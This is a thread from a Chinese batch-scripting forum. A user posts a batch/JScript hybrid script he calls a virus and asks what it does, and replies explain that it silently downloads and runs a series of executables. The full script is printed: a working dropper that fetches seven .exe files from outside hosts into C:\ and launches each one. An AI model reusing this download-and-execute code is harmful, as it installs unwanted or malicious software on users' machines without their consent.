[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖

[其他] 谁能解释一下这个病毒批处理代码的意思

本帖最后由 注册个几8 于 2015-8-16 18:44 编辑

代码如下:
  1. echo=1/*>nul
  2. @cls
  3. @echo off
  4. call :http "http://down.ssddl.com/xzrpdf_70247.exe" "c:\xzrpdf_70247.exe"
  5. call :http "http://down.ssddl.com/zupmopn_30394.exe" "c:\zupmopn_30394.exe"
  6. start c:\xzrpdf_70247.exe
  7. start c:\zupmopn_30394.exe
  8. call :http "http://down.ssddl.com/jKINSTALLERS_60_201153.exe" "c:\jKINSTALLERS_60_201153.exe"
  9. call :http "http://down.ssddl.com/t10021.exe" "c:\t10021.exe"
  10. call :http "http://down.ssddl.com/setupX071_32.exe" "c:\setupX071_32.exe"
  11. call :http "http://down.yinyue.fm/open/setup_3102-22942.exe" "c:\setup_3102-22942.exe"
  12. call :http "http://down.ssddl.com/setupX_2002_221.exe" "c:\setupX_2002_221.exe"
  13. start c:\jKINSTALLERS_60_201153.exe
  14. start c:\t10021.exe
  15. start c:\setupX071_32.exe
  16. start c:\setup_3102-22942.exe
  17. start c:\setupX_2002_221.exe
  18. goto :eof
  19. :http
  20. cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
  21. goto :eof
  22. */
  23. var iLocal,iRemote,xPost,sGet;
  24. iLocal =WScript.Arguments(1);
  25. iRemote = WScript.Arguments(0);
  26. iLocal=iLocal.toLowerCase();
  27. xPost = new ActiveXObject("MSXML2.XMLHTTP.3.0");
  28. xPost.Open("GET",iRemote,0);
  29. xPost.Send();
  30. sGet = new ActiveXObject("ADODB.Stream");
  31. sGet.Mode = 3;
  32. sGet.Type = 1;
  33. sGet.Open();
  34. sGet.Write(xPost.responseBody);
  35. sGet.SaveToFile(iLocal,2);
  36. sGet.Close();
复制代码

应该是在指定的网站上下载一系列安装包进行安装,貌似是静默安装

TOP

我靠,还有这么高档的病毒

TOP

就是下一堆exe来安装咯
让人惊讶的是不光结构很好,而且居然还用了混编...

TOP

玩病毒的也讲经济效益哈
科技是第一生产力啊

TOP

返回列表